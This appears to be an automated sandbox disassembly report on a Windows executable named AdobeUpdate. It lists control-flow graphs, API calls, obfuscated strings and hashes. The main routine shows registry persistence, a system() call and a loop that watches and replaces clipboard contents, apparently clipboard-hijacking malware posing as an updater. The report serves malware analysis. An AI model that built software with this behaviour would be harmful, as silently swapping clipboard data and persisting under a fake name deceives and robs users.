                                    control_flow_graph 0 7ff6c12ab900-7ff6c12ab952 1 7ff6c12ab956-7ff6c12ab961 0->1 2 7ff6c12ab963-7ff6c12ab966 1->2 3 7ff6c12ab968-7ff6c12ab980 OpenMutexA 1->3 2->1 4 7ff6c12ab982-7ff6c12ab984 3->4 5 7ff6c12ab989-7ff6c12ab9ac _dupenv_s 3->5 8 7ff6c12ac88f-7ff6c12ac8ba call 7ff6c12ad030 4->8 6 7ff6c12ab9b2-7ff6c12ab9ba 5->6 7 7ff6c12ac88c 5->7 6->7 9 7ff6c12ab9c0-7ff6c12aba15 call 7ff6c12a1d68 call 7ff6c12a242c 6->9 7->8 16 7ff6c12aba49-7ff6c12aba67 free 9->16 17 7ff6c12aba17-7ff6c12aba27 9->17 20 7ff6c12aba6e-7ff6c12aba79 16->20 18 7ff6c12aba44 call 7ff6c12accc4 17->18 19 7ff6c12aba29-7ff6c12aba3b 17->19 18->16 19->18 21 7ff6c12aba3d-7ff6c12aba43 _invalid_parameter_noinfo_noreturn 19->21 23 7ff6c12aba80-7ff6c12abb76 call 7ff6c12a23e8 call 7ff6c12a1f10 call 7ff6c12a60cc call 7ff6c12aa294 GetModuleFileNameA call 7ff6c12a23a4 call 7ff6c12aa810 20->23 24 7ff6c12aba7b-7ff6c12aba7e 20->24 21->18 37 7ff6c12ac540-7ff6c12ac557 call 7ff6c12aa294 23->37 38 7ff6c12abb7c-7ff6c12abbc8 call 7ff6c12a5284 23->38 24->20 43 7ff6c12ac590-7ff6c12ac5c5 call 7ff6c12aa294 37->43 44 7ff6c12ac559-7ff6c12ac56e 37->44 45 7ff6c12abbd1-7ff6c12abbe5 38->45 55 7ff6c12ac5cc-7ff6c12ac5d7 43->55 47 7ff6c12ac570-7ff6c12ac582 44->47 48 7ff6c12ac58b call 7ff6c12accc4 44->48 45->45 49 7ff6c12abbe7-7ff6c12abc0d call 7ff6c12a18c8 45->49 47->48 52 7ff6c12ac584-7ff6c12ac58a _invalid_parameter_noinfo_noreturn 47->52 48->43 56 7ff6c12abc17-7ff6c12abc25 49->56 52->48 57 7ff6c12ac5de-7ff6c12ac5ea CreateMutexA 55->57 58 7ff6c12ac5d9-7ff6c12ac5dc 55->58 59 7ff6c12abc2f-7ff6c12abd38 call 7ff6c12a18c8 call 7ff6c12a24ac call 7ff6c12a18b4 call 7ff6c12a18c8 call 7ff6c12a24ac call 7ff6c12a18b4 call 7ff6c12a18c8 56->59 60 7ff6c12abc27-7ff6c12abc2d 56->60 61 7ff6c12ac5f0-7ff6c12ac607 Sleep GetClipboardSequenceNumber 57->61 58->55 106 7ff6c12abd40-7ff6c12abd54 59->106 60->56 61->61 63 7ff6c12ac609-7ff6c12ac613 OpenClipboard 61->63 63->61 65 7ff6c12ac615-7ff6c12ac628 call 7ff6c12a6670 63->65 71 7ff6c12ac62e-7ff6c12ac638 65->71 72 7ff6c12ac877-7ff6c12ac87c call 7ff6c12a670c 65->72 71->72 75 7ff6c12ac63e-7ff6c12ac680 call 7ff6c12a1e44 71->75 79 7ff6c12ac857-7ff6c12ac85e 72->79 84 7ff6c12ac687-7ff6c12ac68a 75->84 79->61 83 7ff6c12ac864-7ff6c12ac872 call 7ff6c12a630c 79->83 83->61 85 7ff6c12ac690-7ff6c12ac694 84->85 86 7ff6c12ac7fc-7ff6c12ac80c call 7ff6c12a670c 84->86 90 7ff6c12ac79e-7ff6c12ac7a2 85->90 91 7ff6c12ac69a-7ff6c12ac6c6 call 7ff6c12a49b0 85->91 99 7ff6c12ac83e-7ff6c12ac850 86->99 100 7ff6c12ac80e-7ff6c12ac822 86->100 90->84 102 7ff6c12ac6c8-7ff6c12ac6d3 91->102 103 7ff6c12ac746-7ff6c12ac751 91->103 99->79 104 7ff6c12ac824-7ff6c12ac837 100->104 105 7ff6c12ac839 call 7ff6c12accc4 100->105 107 7ff6c12ac6d5-7ff6c12ac6e9 102->107 108 7ff6c12ac709-7ff6c12ac743 memmove 102->108 110 7ff6c12ac753-7ff6c12ac767 103->110 111 7ff6c12ac787-7ff6c12ac79c call 7ff6c12a1a34 103->111 104->105 109 7ff6c12ac885-7ff6c12ac88b _invalid_parameter_noinfo_noreturn 104->109 105->99 106->106 114 7ff6c12abd56-7ff6c12abdec call 7ff6c12a18c8 call 7ff6c12a24ac call 7ff6c12a18b4 call 7ff6c12a18c8 106->114 115 7ff6c12ac704 call 7ff6c12accc4 107->115 116 7ff6c12ac6eb-7ff6c12ac6fe 107->116 108->103 109->7 117 7ff6c12ac782 call 7ff6c12accc4 110->117 118 7ff6c12ac769-7ff6c12ac77c 110->118 111->90 124 7ff6c12ac7a7-7ff6c12ac7bf GlobalAlloc 111->124 133 7ff6c12abdf2-7ff6c12abdfd 114->133 115->108 116->115 121 7ff6c12ac87e-7ff6c12ac884 _invalid_parameter_noinfo_noreturn 116->121 117->111 118->117 118->121 121->109 124->86 126 7ff6c12ac7c1-7ff6c12ac7f6 memmove EmptyClipboard SetClipboardData 124->126 126->86 134 7ff6c12abdff-7ff6c12abe02 133->134 135 7ff6c12abe04-7ff6c12abea7 call 7ff6c12a18c8 call 7ff6c12a24ac call 7ff6c12a18b4 133->135 134->133 142 7ff6c12abeb0-7ff6c12abec4 135->142 142->142 143 7ff6c12abec6-7ff6c12abef0 call 7ff6c12a18c8 142->143 146 7ff6c12abef9-7ff6c12abf07 143->146 147 7ff6c12abf11-7ff6c12abfa9 call 7ff6c12a18c8 call 7ff6c12a24ac call 7ff6c12a18b4 call 7ff6c12a18c8 146->147 148 7ff6c12abf09-7ff6c12abf0f 146->148 157 7ff6c12abfac-7ff6c12abfc0 147->157 148->146 157->157 158 7ff6c12abfc2-7ff6c12ac03e call 7ff6c12a18c8 call 7ff6c12a24ac call 7ff6c12a18b4 157->158 165 7ff6c12ac046-7ff6c12ac05a 158->165 165->165 166 7ff6c12ac05c-7ff6c12ac08c call 7ff6c12a18c8 * 2 165->166 171 7ff6c12ac08e-7ff6c12ac09e 166->171 172 7ff6c12ac0bd-7ff6c12ac0df 166->172 173 7ff6c12ac0a0-7ff6c12ac0b2 171->173 174 7ff6c12ac0b8 call 7ff6c12accc4 171->174 175 7ff6c12ac110-7ff6c12ac132 172->175 176 7ff6c12ac0e1-7ff6c12ac0f1 172->176 173->174 177 7ff6c12ac24f-7ff6c12ac255 _invalid_parameter_noinfo_noreturn 173->177 174->172 181 7ff6c12ac134-7ff6c12ac144 175->181 182 7ff6c12ac163-7ff6c12ac185 175->182 179 7ff6c12ac0f3-7ff6c12ac105 176->179 180 7ff6c12ac10b call 7ff6c12accc4 176->180 188 7ff6c12ac256 call 7ff6c12accc4 177->188 179->177 179->180 180->175 186 7ff6c12ac15e call 7ff6c12accc4 181->186 187 7ff6c12ac146-7ff6c12ac158 181->187 183 7ff6c12ac1b6-7ff6c12ac1d8 182->183 184 7ff6c12ac187-7ff6c12ac197 182->184 193 7ff6c12ac205-7ff6c12ac227 183->193 194 7ff6c12ac1da-7ff6c12ac1ea 183->194 191 7ff6c12ac1b1 call 7ff6c12accc4 184->191 192 7ff6c12ac199-7ff6c12ac1ab 184->192 186->182 187->177 187->186 195 7ff6c12ac25b-7ff6c12ac2a9 188->195 191->183 192->177 192->191 193->195 199 7ff6c12ac229-7ff6c12ac239 193->199 197 7ff6c12ac200 call 7ff6c12accc4 194->197 198 7ff6c12ac1ec-7ff6c12ac1fe 194->198 200 7ff6c12ac2b2-7ff6c12ac2c6 195->200 197->193 198->177 198->197 199->188 202 7ff6c12ac23b-7ff6c12ac24d 199->202 200->200 203 7ff6c12ac2c8-7ff6c12ac3c5 RegCreateKeyA call 7ff6c12a24ac * 2 RegSetValueExA 200->203 202->177 202->188 208 7ff6c12ac3f2-7ff6c12ac414 203->208 209 7ff6c12ac3c7-7ff6c12ac3d7 203->209 212 7ff6c12ac448-7ff6c12ac480 call 7ff6c12ab754 system 208->212 213 7ff6c12ac416-7ff6c12ac426 208->213 210 7ff6c12ac3d9-7ff6c12ac3eb 209->210 211 7ff6c12ac3ed call 7ff6c12accc4 209->211 210->211 215 7ff6c12ac43c-7ff6c12ac442 _invalid_parameter_noinfo_noreturn 210->215 211->208 221 7ff6c12ac4b4-7ff6c12ac4de call 7ff6c12a5d28 ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff6c12aa294 212->221 222 7ff6c12ac482-7ff6c12ac492 212->222 217 7ff6c12ac443 call 7ff6c12accc4 213->217 218 7ff6c12ac428-7ff6c12ac43a 213->218 215->217 217->212 218->215 218->217 231 7ff6c12ac4e0-7ff6c12ac4f5 221->231 232 7ff6c12ac517-7ff6c12ac53b call 7ff6c12aa294 221->232 223 7ff6c12ac4af call 7ff6c12accc4 222->223 224 7ff6c12ac494-7ff6c12ac4a6 222->224 223->221 224->223 226 7ff6c12ac4a8-7ff6c12ac4ae _invalid_parameter_noinfo_noreturn 224->226 226->223 233 7ff6c12ac512 call 7ff6c12accc4 231->233 234 7ff6c12ac4f7-7ff6c12ac509 231->234 232->37 233->232 234->233 236 7ff6c12ac50b-7ff6c12ac511 _invalid_parameter_noinfo_noreturn 234->236 236->233
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1694273935.00007FF6C12A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C12A0000, based on PE: true
                                    • Associated: 00000001.00000002.1694220296.00007FF6C12A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694312718.00007FF6C12AF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694483866.00007FF6C12B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694847088.00007FF6C12B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ff6c12a0000_AdobeUpdate.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter_noinfo_noreturn$Clipboard$memmove$CreateMutexOpen$??1?$basic_ios@AllocD@std@@@std@@DataEmptyFileGlobalModuleNameNumberSequenceSleepU?$char_traits@Value_dupenv_sfreesystem
                                    • String ID: && exit "$" "$" && $7*0&$9./5$92($?fd$@3%$F%)6$Microsoft Edge$localappdata$prr
                                    • API String ID: 1980490673-2619721367
                                    • Opcode ID: 0f8cdfebe0a83a0680be914d843486d997c6423b7a8fdb805b3714d5dd2bff2f
                                    • Instruction ID: c54c3ea40ac8b973875eba14b992a2da5ca68fba215832cf832eecba8e221e06
                                    • Opcode Fuzzy Hash: 0f8cdfebe0a83a0680be914d843486d997c6423b7a8fdb805b3714d5dd2bff2f
                                    • Instruction Fuzzy Hash: C7927E66A08BC289EB31CF38D9453ED6361FB45799F504235DB9D8AA9ADF7CD284C300

                                    Control-flow Graph

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1694273935.00007FF6C12A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C12A0000, based on PE: true
                                    • Associated: 00000001.00000002.1694220296.00007FF6C12A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694312718.00007FF6C12AF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694483866.00007FF6C12B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694847088.00007FF6C12B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ff6c12a0000_AdobeUpdate.jbxd
                                    Similarity
                                    • API ID: __scrt_acquire_startup_lock__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock_cexit_exit_get_wide_winmain_command_line_register_thread_local_exe_atexit_callback
                                    • String ID:
                                    • API String ID: 1020558986-0
                                    • Opcode ID: 78a97766118129f21d818817cbad7ed6548654daf1910381c6a4593ad2caefed
                                    • Instruction ID: 8658604593cebf7aa87ddc8f3ce495ee3759b70f9331ffd1761787cf31b9b70d
                                    • Opcode Fuzzy Hash: 78a97766118129f21d818817cbad7ed6548654daf1910381c6a4593ad2caefed
                                    • Instruction Fuzzy Hash: 78311729E0C24B45FB64AF64A7513B92291AF81746F445435EACECB6E3DE2CF884C250

                                    Control-flow Graph

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1694273935.00007FF6C12A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C12A0000, based on PE: true
                                    • Associated: 00000001.00000002.1694220296.00007FF6C12A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694312718.00007FF6C12AF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694483866.00007FF6C12B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694847088.00007FF6C12B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ff6c12a0000_AdobeUpdate.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                    • String ID:
                                    • API String ID: 313767242-0
                                    • Opcode ID: aaac3d8bcd2409564a93bb2692e41ca80ea2fafb89281b964e3b37efff4b1c1f
                                    • Instruction ID: 959f18db590ab147fb68ad7f6219da2c71958a89b081abfbb74104c43a591e90
                                    • Opcode Fuzzy Hash: aaac3d8bcd2409564a93bb2692e41ca80ea2fafb89281b964e3b37efff4b1c1f
                                    • Instruction Fuzzy Hash: B6317276608B858AEB709F60E8503EE7360FB84745F44403ADA8D87B99DF3CD588C710
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1694273935.00007FF6C12A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C12A0000, based on PE: true
                                    • Associated: 00000001.00000002.1694220296.00007FF6C12A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694312718.00007FF6C12AF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694483866.00007FF6C12B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694847088.00007FF6C12B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ff6c12a0000_AdobeUpdate.jbxd
                                    Similarity
                                    • API ID: FormatInfoLocaleMessage
                                    • String ID: !x-sys-default-locale
                                    • API String ID: 4235545615-2729719199
                                    • Opcode ID: 4a16ee6a4f9f7a58f6f0993f016c016337146f7ae58b0ac5f22ac39274476180
                                    • Instruction ID: 6683de96ae19f47227617e76408889f254f3acf654b3be4db2f70e4e425b5359
                                    • Opcode Fuzzy Hash: 4a16ee6a4f9f7a58f6f0993f016c016337146f7ae58b0ac5f22ac39274476180
                                    • Instruction Fuzzy Hash: 8001B176B1878682E7208F21F5407BAB7A1F7897D5F844135D68D82B88CF3CD485CB44
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1694273935.00007FF6C12A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C12A0000, based on PE: true
                                    • Associated: 00000001.00000002.1694220296.00007FF6C12A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694312718.00007FF6C12AF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694483866.00007FF6C12B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694847088.00007FF6C12B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ff6c12a0000_AdobeUpdate.jbxd
                                    Similarity
                                    • API ID: ClipboardDatamemmove
                                    • String ID:
                                    • API String ID: 3657360178-0
                                    • Opcode ID: 7cd69b7c4ad872ffde38bc3ea661b3f0bdf98027421623417369893fb5a22d0f
                                    • Instruction ID: 9c0bb6e3ef8fb659f5a4a8c22282c827c537bb667b51da2b1d85c8c7c343fd74
                                    • Opcode Fuzzy Hash: 7cd69b7c4ad872ffde38bc3ea661b3f0bdf98027421623417369893fb5a22d0f
                                    • Instruction Fuzzy Hash: 0611E152E2C78486FB108F30D51137A63A0EB69BA4F145334EAED462C6DF6CE0C08740
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1694273935.00007FF6C12A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C12A0000, based on PE: true
                                    • Associated: 00000001.00000002.1694220296.00007FF6C12A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694312718.00007FF6C12AF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694483866.00007FF6C12B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694847088.00007FF6C12B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ff6c12a0000_AdobeUpdate.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f68ef08b99faef8739895086fe2702296faa35abbdccbbabc440264f9488251f
                                    • Instruction ID: 5ce11e0f922149c2c974f2a5d58f887acad42d0bf75c633bba025e0c1cec7136
                                    • Opcode Fuzzy Hash: f68ef08b99faef8739895086fe2702296faa35abbdccbbabc440264f9488251f
                                    • Instruction Fuzzy Hash: E0A0022994CC07D4E7188F00FB501343330FB68702B414072C08DC1464DF3CB580C350

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 303 7ff6c12a378c-7ff6c12a37c6 304 7ff6c12a38c6-7ff6c12a3905 call 7ff6c12aa580 303->304 305 7ff6c12a37cc-7ff6c12a37de 303->305 318 7ff6c12a3a1e-7ff6c12a3a23 call 7ff6c12aa580 304->318 319 7ff6c12a390b-7ff6c12a391d 304->319 306 7ff6c12a37e0-7ff6c12a37ea 305->306 307 7ff6c12a37ec-7ff6c12a37fb 305->307 309 7ff6c12a3818 call 7ff6c12a1a70 306->309 307->306 310 7ff6c12a37fd-7ff6c12a3816 307->310 315 7ff6c12a381d-7ff6c12a3820 309->315 310->309 312 7ff6c12a3822-7ff6c12a3825 310->312 316 7ff6c12a382e 312->316 317 7ff6c12a3827 312->317 320 7ff6c12a3830-7ff6c12a3842 315->320 316->320 321 7ff6c12a3827 call 7ff6c12acc88 317->321 323 7ff6c12a391f-7ff6c12a3929 319->323 324 7ff6c12a392b-7ff6c12a393a 319->324 328 7ff6c12a388f-7ff6c12a389b memmove 320->328 329 7ff6c12a3844-7ff6c12a3864 memmove 320->329 326 7ff6c12a382c 321->326 325 7ff6c12a3957 call 7ff6c12a1a70 323->325 324->323 330 7ff6c12a393c-7ff6c12a3955 324->330 340 7ff6c12a395c-7ff6c12a395f 325->340 326->315 332 7ff6c12a38a1-7ff6c12a38c5 328->332 333 7ff6c12a387e-7ff6c12a3886 call 7ff6c12accc4 329->333 334 7ff6c12a3866-7ff6c12a3879 329->334 330->325 335 7ff6c12a3961-7ff6c12a3964 330->335 333->332 336 7ff6c12a3888-7ff6c12a388e _invalid_parameter_noinfo_noreturn 334->336 337 7ff6c12a387b 334->337 338 7ff6c12a3966 335->338 339 7ff6c12a396d 335->339 336->328 337->333 342 7ff6c12a3966 call 7ff6c12acc88 338->342 343 7ff6c12a396f-7ff6c12a398a 339->343 340->343 345 7ff6c12a396b 342->345 346 7ff6c12a39e0-7ff6c12a39f6 memmove * 2 343->346 347 7ff6c12a398c-7ff6c12a39b5 memmove * 2 343->347 345->340 350 7ff6c12a39fb-7ff6c12a3a1d 346->350 348 7ff6c12a39cf-7ff6c12a39d7 call 7ff6c12accc4 347->348 349 7ff6c12a39b7-7ff6c12a39ca 347->349 348->350 351 7ff6c12a39d9-7ff6c12a39df _invalid_parameter_noinfo_noreturn 349->351 352 7ff6c12a39cc 349->352 351->346 352->348
                                    APIs
                                    • memmove.VCRUNTIME140(?,00000000,?,00007FF6C12A2761,?,?,?,00007FF6C12A3EE1), ref: 00007FF6C12A384A
                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,00007FF6C12A2761,?,?,?,00007FF6C12A3EE1), ref: 00007FF6C12A3888
                                    • memmove.VCRUNTIME140(?,00000000,?,00007FF6C12A2761,?,?,?,00007FF6C12A3EE1), ref: 00007FF6C12A3892
                                    • memmove.VCRUNTIME140(?,?,?,00000000,?,00000000,?,00007FF6C12A2761,?,?,?,00007FF6C12A3EE1), ref: 00007FF6C12A3992
                                    • memmove.VCRUNTIME140(?,?,?,00000000,?,00000000,?,00007FF6C12A2761,?,?,?,00007FF6C12A3EE1), ref: 00007FF6C12A39A0
                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000000,?,00000000,?,00007FF6C12A2761,?,?,?,00007FF6C12A3EE1), ref: 00007FF6C12A39D9
                                    • memmove.VCRUNTIME140(?,?,?,00000000,?,00000000,?,00007FF6C12A2761,?,?,?,00007FF6C12A3EE1), ref: 00007FF6C12A39E3
                                    • memmove.VCRUNTIME140(?,?,?,00000000,?,00000000,?,00007FF6C12A2761,?,?,?,00007FF6C12A3EE1), ref: 00007FF6C12A39F1
                                      • Part of subcall function 00007FF6C12ACC88: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6C12A8F80), ref: 00007FF6C12ACCA2
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1694273935.00007FF6C12A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C12A0000, based on PE: true
                                    • Associated: 00000001.00000002.1694220296.00007FF6C12A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694312718.00007FF6C12AF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694483866.00007FF6C12B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694847088.00007FF6C12B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ff6c12a0000_AdobeUpdate.jbxd
                                    Similarity
                                    • API ID: memmove$_invalid_parameter_noinfo_noreturn$malloc
                                    • String ID:
                                    • API String ID: 1479149652-0
                                    • Opcode ID: 7e944f2b0d9bcedb63418371ff5278b368d0ba77e2cce49da8892cb3a4319cea
                                    • Instruction ID: 004aacddafc6237ae3a5b35574813597364cc83d96f12203fb45a0ca9f3ed2bd
                                    • Opcode Fuzzy Hash: 7e944f2b0d9bcedb63418371ff5278b368d0ba77e2cce49da8892cb3a4319cea
                                    • Instruction Fuzzy Hash: 9461E22AB0878295EF149F26A604369A752FB04FD1F588532DF9D4BB96CE7CE0D18300

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 355 7ff6c12a6ccc-7ff6c12a6cf2 356 7ff6c12a6cf4-7ff6c12a6d18 ?tolower@?$ctype@D@std@@QEBADD@Z * 2 355->356 357 7ff6c12a6d1a-7ff6c12a6d1d 355->357 358 7ff6c12a6d1f-7ff6c12a6d25 356->358 357->358 359 7ff6c12a6e4f-7ff6c12a6e67 358->359 360 7ff6c12a6d2b 358->360 361 7ff6c12a6d31-7ff6c12a6d3b call 7ff6c12a8ea0 360->361 364 7ff6c12a6d8b-7ff6c12a6d8d 361->364 365 7ff6c12a6d3d-7ff6c12a6d44 361->365 364->359 368 7ff6c12a6d93-7ff6c12a6da1 call 7ff6c12a8f34 364->368 366 7ff6c12a6d70-7ff6c12a6d89 365->366 367 7ff6c12a6d46 365->367 366->361 366->364 370 7ff6c12a6d49 call 7ff6c12acc88 367->370 373 7ff6c12a6da3-7ff6c12a6db2 call 7ff6c12a6844 368->373 374 7ff6c12a6db9-7ff6c12a6dc0 368->374 372 7ff6c12a6d4e-7ff6c12a6d59 370->372 375 7ff6c12a6d5b-7ff6c12a6d68 memset 372->375 376 7ff6c12a6d6a 372->376 387 7ff6c12a6db4 373->387 378 7ff6c12a6dc2 374->378 379 7ff6c12a6deb-7ff6c12a6df4 374->379 380 7ff6c12a6d6c 375->380 376->380 382 7ff6c12a6dc5 call 7ff6c12acc88 378->382 383 7ff6c12a6e0e-7ff6c12a6e28 379->383 384 7ff6c12a6df6-7ff6c12a6e07 realloc 379->384 380->366 388 7ff6c12a6dca-7ff6c12a6dd5 382->388 385 7ff6c12a6e42-7ff6c12a6e4c 383->385 386 7ff6c12a6e2a-7ff6c12a6e3b realloc 383->386 389 7ff6c12a6e6e-7ff6c12a6e73 ?_Xbad_alloc@std@@YAXXZ 384->389 390 7ff6c12a6e09-7ff6c12a6e0c 384->390 385->359 391 7ff6c12a6e68-7ff6c12a6e6d call 7ff6c12ac8c1 386->391 392 7ff6c12a6e3d-7ff6c12a6e40 386->392 387->359 393 7ff6c12a6de5 388->393 394 7ff6c12a6dd7-7ff6c12a6de3 388->394 390->383 391->389 392->385 396 7ff6c12a6de7 393->396 394->396 396->379
                                    APIs
                                    • ?tolower@?$ctype@D@std@@QEBADD@Z.MSVCP140(?,?,?,00007FF6C12A7EBF,?,?,?,?,?,?,?,00007FF6C12A7CE8), ref: 00007FF6C12A6CFC
                                    • ?tolower@?$ctype@D@std@@QEBADD@Z.MSVCP140(?,?,?,00007FF6C12A7EBF,?,?,?,?,?,?,?,00007FF6C12A7CE8), ref: 00007FF6C12A6D0F
                                    • memset.VCRUNTIME140(?,?,?,00007FF6C12A7EBF,?,?,?,?,?,?,?,00007FF6C12A7CE8), ref: 00007FF6C12A6D63
                                    • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6C12A7EBF,?,?,?,?,?,?,?,00007FF6C12A7CE8), ref: 00007FF6C12A6DFE
                                    • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6C12A7EBF,?,?,?,?,?,?,?,00007FF6C12A7CE8), ref: 00007FF6C12A6E32
                                    • ?_Xbad_alloc@std@@YAXXZ.MSVCP140(?,?,?,00007FF6C12A7EBF,?,?,?,?,?,?,?,00007FF6C12A7CE8), ref: 00007FF6C12A6E6E
                                      • Part of subcall function 00007FF6C12ACC88: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6C12A8F80), ref: 00007FF6C12ACCA2
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1694273935.00007FF6C12A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C12A0000, based on PE: true
                                    • Associated: 00000001.00000002.1694220296.00007FF6C12A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694312718.00007FF6C12AF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694483866.00007FF6C12B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694847088.00007FF6C12B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ff6c12a0000_AdobeUpdate.jbxd
                                    Similarity
                                    • API ID: ?tolower@?$ctype@D@std@@realloc$Xbad_alloc@std@@mallocmemset
                                    • String ID:
                                    • API String ID: 3661150764-0
                                    • Opcode ID: 013138b7fa9eaf1f874e2d65456e622f28f172764970678887205d3d68904c82
                                    • Instruction ID: 42446c6eb455fb924329c415368b15169823a710196db3baaad09b81ecee6b06
                                    • Opcode Fuzzy Hash: 013138b7fa9eaf1f874e2d65456e622f28f172764970678887205d3d68904c82
                                    • Instruction Fuzzy Hash: 7C519F36A09A4286EB519F25D68067CB7A1FB88F86F498035DB9D87385DF3CD8D2C340

                                    Control-flow Graph

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1694273935.00007FF6C12A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C12A0000, based on PE: true
                                    • Associated: 00000001.00000002.1694220296.00007FF6C12A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694312718.00007FF6C12AF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694483866.00007FF6C12B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694847088.00007FF6C12B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ff6c12a0000_AdobeUpdate.jbxd
                                    Similarity
                                    • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                    • String ID:
                                    • API String ID: 2016347663-0
                                    • Opcode ID: 26b11adda677e6b343809b3a9c1f49ea10735b2f8080227b866242dc9828e6e7
                                    • Instruction ID: cc621773e6061d8a936023e1843170980575c168f53cb0b5b616673cc2a91189
                                    • Opcode Fuzzy Hash: 26b11adda677e6b343809b3a9c1f49ea10735b2f8080227b866242dc9828e6e7
                                    • Instruction Fuzzy Hash: AF41C36AB0864595EF109F1AF6042AAA351EB08FE1F548631DEED87BD6DE3CE1C18304

                                    Control-flow Graph

                                    APIs
                                    • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF6C12A2F46
                                    • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF6C12A2F4D
